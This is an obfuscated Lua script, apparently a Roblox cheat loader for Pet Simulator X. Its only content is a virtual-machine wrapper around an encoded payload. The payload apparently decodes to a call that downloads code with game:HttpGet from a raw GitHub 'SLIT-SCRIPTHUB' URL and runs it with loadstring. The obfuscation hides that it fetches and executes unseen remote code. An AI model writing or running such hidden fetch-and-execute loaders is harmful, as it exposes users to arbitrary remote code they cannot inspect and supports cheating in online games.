--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;while true do if (0==v0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==4) then v13=unpack or table.unpack;v14=tonumber;v15=nil;v0=5;end if (v0==2) then v7=table.concat;v8=table.insert;v9=getfenv or function()return _ENV;end;v0=3;end if (v0==5) then function v15(v16,v17)local v18=1;local v19;v16=v5(v4(v16,5),"..",function(v30)if (v2(v30,2)==79) then v19=v1(v4(v30,1,1));return "";else local v61=v3(v1(v30,16));if v19 then local v74=0;local v75;while true do if (v74==0) then v75=v6(v61,v19);v19=nil;v74=1;end if (v74==1) then return v75;end end else return v61;end end end);local function v20(v31,v32,v33)if v33 then local v62=(v31/((1770 -(1101 + 667))^(v32-((1298 -(1114 + 183)) -0))))%(2^(((v33-1) -(v32-(1 -0))) + 1 + 0));return v62-(v62%(1 + 0));else local v63=0;local v64;while true do if (v63==(0 + 0)) then v64=(1 + (1795 -(1015 + 779)))^(v32-(1 + 0));return (((v31%(v64 + v64))>=v64) and (1 -0)) or 0;end end end end local function v21()local v38=v2(v16,v18,v18);v18=v18 + 1;return v38;end local function v22()local v39,v40=v2(v16,v18,v18 + 1 + 1);v18=v18 + (6 -4);return (v40 * (118 + 138)) + v39;end local function v23()local v41=0 + 0;local v42;local v43;local v44;local v45;while true do if (v41==(1 + 0)) then return (v45 * (16778337 -(740 + 381))) + (v44 * 65536) + (v43 * (208 + 48)) + v42;end if (v41==(0 -0)) then v42,v43,v44,v45=v2(v16,v18,v18 + 3);v18=v18 + 2 + 2;v41=417 -(296 + (1587 -(702 + 765)));end end end local function v24()local v46=v23();local v47=v23();return (( -(1 + 1) * v20(v47,(3516 -(1512 + 53)) -(214 + 422 + 1283))) + 1 + 0) * ((6 -(14 -10))^(v20(v47,21,(292 -(109 + 116)) -36) -1023)) * ((((v20(v47,(472 -176) -(244 + 51),17 + 3) * ((2 -0)^(611 -((1041 -601) + 139)))) + v46)/((2 + 0)^((259 -141) -66))) + (1570 -(874 + 695)));end local function v25(v34)local v48=0 + 0;local v49;local v50;while true do if ((2 + 0)==v48) then v50={};for v76=1392 -(1085 + 79 + 227), #v49 do v50[v76]=v3(v2(v4(v49,v76,v76)));end v48=12 -9;end if (v48==(1277 -(717 + 560))) then v49=nil;if  not v34 then v34=v23();if (v34==0) then return "";end end v48=1939 -((2893 -(75 + 930)) + 50);end if (v48==1) then v49=v4(v16,v18,(v18 + v34) -(2 -1));v18=v18 + v34;v48=3 -1;end if (v48==(337 -(48 + 286))) then return v7(v50);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 + 0;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v51==(565 -(523 + 41))) then v56=v23();v57={};for v78=1290 -(358 + 931),v56 do local v79=0;local v80;local v81;local v82;local v83;local v84;while true do if (v79==(1715 -(535 + 1178))) then v84=nil;while true do if (v80~=(4 -2)) then else while true do if (v81~=0) then else local v105=0;local v106;while true do if (v105~=0) then else v106=0;while true do if (v106~=(1 + 0)) then else v81=691 -(441 + 249);break;end if ((0 + 0)==v106) then local v134=0;while true do if ((1397 -(835 + 562))==v134) then v82=0 -0;v83=nil;v134=1;end if (1~=v134) then else v106=1;break;end end end end break;end end end if (v81~=1) then else v84=nil;while true do if (v82~=(525 -(518 + 7))) then else local v110=852 -(710 + 142);local v111;while true do if (v110~=(97 -(20 + 77))) then else v111=0;while true do if (v111==0) then v83=v21();v84=nil;v111=1 -0;end if (1==v111) then v82=1917 -(874 + 1042);break;end end break;end end end if (v82~=(1992 -(1436 + 555))) then else if (v83==1) then v84=v21()~=(44 -(38 + 6));elseif (v83==2) then v84=v24();elseif (v83==(2 + 1)) then v84=v25();end v57[v78]=v84;break;end end break;end end break;end if (v80~=(1 + 0)) then else local v100=0;while true do if (v100==1) then v80=2;break;end if (v100==0) then v83=nil;v84=nil;v100=1;end end end if (v80==0) then v81=0 + 0;v82=nil;v80=1;end end break;end if ((1 + 0)~=v79) then else v82=nil;v83=nil;v79=5 -3;end if ((0 + 0)~=v79) then else v80=0;v81=nil;v79=1 + 0;end end end v55[1144 -(350 + 791)]=v21();v51=257 -(118 + 137);end if (v51~=(0 -0)) then else v52={};v53={};v54={};v55={v52,v53,nil,v54};v51=2 -1;end if ((5 -3)==v51) then local v72=0;local v73;while true do if (v72==(0 + 0)) then v73=0;while true do local v85=0;while true do if (0==v85) then if (v73==0) then local v104=0;while true do if (v104~=(0 -0)) then else for v113=1,v23() do local v114=0;local v115;local v116;local v117;local v118;while true do if (v114==0) then v115=0 + 0;v116=nil;v114=1 + 0;end if (v114==(1 + 0)) then v117=nil;v118=nil;v114=2;end if (v114==2) then while true do if (v115==0) then v116=0;v117=nil;v115=3 -2;end if (v115~=(1 -0)) then else v118=nil;while true do if (v116==(834 -(279 + 554))) then while true do if (v117~=(0 + 0)) then else v118=v21();if (v20(v118,1,1)==0) then local v145=0 + 0;local v146;local v147;local v148;while true do if (v145==2) then local v150=0;while true do if (v150==(2 -1)) then v145=3;break;end if (v150==0) then local v156=0 + 0;while true do if (v156==1) then v150=1 + 0;break;end if (0==v156) then if (v20(v147,946 -(821 + 124),1)==1) then v148[2]=v57[v148[2 + 0]];end if (v20(v147,1 + 1,1706 -(380 + 1324))==(1079 -(633 + 445))) then v148[1388 -(275 + 1110)]=v57[v148[3]];end v156=1517 -(734 + 782);end end end end end if (v145==(2 + 1)) then if (v20(v147,3,3)~=(1 + 0)) then else v148[11 -7]=v57[v148[4]];end v52[v113]=v148;break;end if ((1 + 0)~=v145) then else local v152=956 -(345 + 611);while true do if (v152==0) then v148={v22(),v22(),nil,nil};if (v146==(0 -0)) then local v157=0 + 0;local v158;local v159;while true do if ((1 + 0)==v157) then while true do if (v158~=(0 -0)) then else v159=0 -0;while true do if (v159~=(0 + 0)) then else v148[5 -2]=v22();v148[10 -6]=v22();break;end end break;end end break;end if (v157==0) then v158=0 -0;v159=nil;v157=104 -(17 + 86);end end elseif (v146==(3 -2)) then v148[3 + 0]=v23();elseif (v146==(2 -0)) then v148[4 -1]=v23() -(2^(44 -28));elseif (v146==(2 + 1)) then local v164=955 -(457 + 498);local v165;local v166;local v167;while true do if (v164~=1) then else v167=nil;while true do if (v165~=(0 -0)) then else local v170=0 -0;while true do if ((314 -(18 + 296))~=v170) then else v166=0 + 0;v167=nil;v170=485 -(65 + 419);end if (v170==1) then v165=1;break;end end end if (v165~=(1 + 0)) then else while true do if (v166~=0) then else v167=0;while true do if (v167~=0) then else v148[3]=v23() -((2 + 0)^(242 -(176 + 50)));v148[4]=v22();break;end end break;end end break;end end break;end if (v164==0) then v165=0;v166=nil;v164=1;end end end v152=1 + 0;end if ((1746 -(1046 + 699))~=v152) then else v145=2;break;end end end if ((0 + 0)==v145) then local v153=0;local v154;while true do if (v153==(0 + 0)) then v154=0;while true do if (v154~=(0 -0)) then else v146=v20(v118,7 -5,3);v147=v20(v118,4,1 + 5);v154=3 -2;end if (v154==(1 + 0)) then v145=1;break;end end break;end end end end end break;end end break;end if (v116~=0) then else local v143=0;local v144;while true do if (v143==(925 -(197 + 728))) then v144=0;while true do if ((1 -0)==v144) then v116=2 -1;break;end if (v144==(0 + 0)) then local v149=0;while true do if (v149==1) then v144=1443 -(773 + 669);break;end if (v149~=0) then else v117=162 -(58 + 104);v118=nil;v149=1 + 0;end end end end break;end end end end break;end end break;end end end for v119=1,v23() do v53[v119-1]=v28();end v104=1365 -(126 + 1238);end if (v104~=1) then else v73=1;break;end end end if (v73==1) then for v107=1,v23() do v54[v107]=v23();end return v55;end break;end end end break;end end end end end local function v29(v35,v36,v37)local v58=v35[1];local v59=v35[2];local v60=v35[3];return function(...)local v65=0;local v66;local v67;local v68;local v69;local v70;while true do if (v65==0) then v66=1;v67= -1;v65=1;end if (v65==2) then v70=nil;function v70()local v86=v58;local v87=Const;local v88=v59;local v89=v60;local v90=v27;local v91={};local v92={};local v93={};for v98=0,v69 do if ((v98>=v89) or ((811 + 107 + 519)<=(652 -(53 + 27 + 185)))) then v91[v98-v89]=v68[v98 + 1];else v93[v98]=v68[v98 + (106 -(28 + 77))];end end local v94=(v69-v89) + (3 -2);local v95;local v96;while true do local v99=0 + 0;while true do if ((3467>=(3653 -(1007 + 126))) and (v99==(0 + 0))) then local v103=0 -(1376 -(550 + 826));while true do if ((v103==(1938 -(1288 + (2672 -2023)))) or (((21948 -17262) -(1346 + 103))>4299)) then v99=1 + 0;break;end if ((v103==0) or (((8737 -3146) -(355 + 324))<(3771 -(266 + 1691)))) then v95=v86[v66];v96=v95[1];v103=1 + 0;end end end if ((((9333 -(474 + 728)) -4691)<(5314 -(290 + 428))) and (v99==(305 -(271 + 33)))) then if (((918 -297)==(621 + 0)) and (v96<=(5 -3))) then if (((1205 -702)<(214 + 553)) and (v96<=(0 + 0))) then v93[v95[(3023 -2138) -(164 + 98 + 621)]]=v95[6 -3];elseif ((v96>((4 -2) -1)) or ((6773 -3368)<((3737 + 1051) -3097))) then v93[v95[2]]();else v93[v95[(698 -319) -(164 + 213)]]=v37[v95[1604 -(576 + 1025)]];end elseif ((v96<=4) or ((12568 -8392)==1314)) then if ((3423>=(1385 -783)) and (v96>((15 -11) -1))) then local v122=99 -(86 + 13);local v123;local v124;local v125;local v126;while true do if ((v122==(1652 -(329 + 1321))) or (3015>(2048 + 1598))) then for v136=v123,v67 do local v137=0;while true do if ((v137==(0 -0)) or (2672>(1700 + 1377))) then v126=v126 + (19 -(6 + 12));v93[v136]=v124[v126];break;end end end break;end if ((v122==(0 + 0)) or ((417 + 404)>=(2561 + 2204))) then local v135=0 -0;while true do if ((((37519 -30009) -(57 + 5843))<(5411 -(957 + 764))) and (v135==(2 -1))) then v122=1394 -(861 + 532);break;end if (((1697 + 233)>=(1191 + 367)) and (v135==0)) then v123=v95[2 + 0];v124,v125=v90(v93[v123](v13(v93,v123 + ((4307 -2976) -(172 + 1158)),v95[9 -(1898 -(1176 + 716))])));v135=1;end end end if (((6128 -1960)>=(2191 -(216 + 532))) and (v122==(1 + 0))) then v67=(v125 + v123) -(1 -0);v126=97 -(87 + 10);v122=2;end end else local v127=596 -(395 + 201);local v128;local v129;local v130;while true do if (((2982 -1923)<(12345 -7942)) and (v127==1)) then v130=nil;while true do if (((3 -2)==v128) or ((3798 -(120 + 62))<=(1093 + 412))) then v93[v129 + 1]=v130;v93[v129]=v130[v95[56 -(25 + 27)]];break;end if (((485 -(206 + 279))==v128) or (2664==(10823 -6247))) then local v140=333 -(108 + 225);while true do if (((5685 -(3903 -2402))==4184) and (v140==0)) then v129=v95[4 -2];v130=v93[v95[3]];v140=1 + 0;end if ((v140==1) or (((8424 -3367) -(386 + 1182))<=(2912 + 296))) then v128=3 -2;break;end end end end break;end if ((v127==(164 -(156 + 8))) or ((8993 -6080)>=4270)) then v128=(0 -0) -0;v129=nil;v127=1 + 0;end end end elseif ((v96>(3 + 2)) or (2754>=3685)) then local v131=0 -0;local v132;local v133;while true do if (((3616 -(1119 + 15))>415) and (v131==(0 -0))) then v132=0 + 0;v133=nil;v131=1;end if ((v131==(1 + 0)) or ((258 -185)>(4628 -(575 + 355)))) then while true do if ((v132==(0 -0)) or ((1026 + 59 + 19)>=(10177 -6101))) then v133=v95[399 -((1974 -(485 + 1398)) + 306)];v93[v133]=v93[v133](v13(v93,v133 + 1 + 0,v67));break;end end break;end end else do return;end end v66=v66 + (2 -1);break;end end end end v65=3;end if (v65==1) then v68={...};v69=v12("#",...) -1;v65=2;end if (v65==3) then A,B=v27(v11(v70));if  not A[1] then local v97=v35[4][v66] or "?";error("Script error at ["   .. v97   .. "]:"   .. A[2]);else return v13(A,2,B);end break;end end end;end return v29(v28(),{},v17)();end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F50726F6A6563742D57442F5053582D5343524950542D2F6D61696E2F534C49542D53435249505448554200083O0012013O00013O001201000100023O00200300010001000300122O000300044O0004000100034O00065O00022O00023O000100012O00053O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9());break;end if (v0==3) then v10=setmetatable;v11=pcall;v12=select;v0=4;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end end end
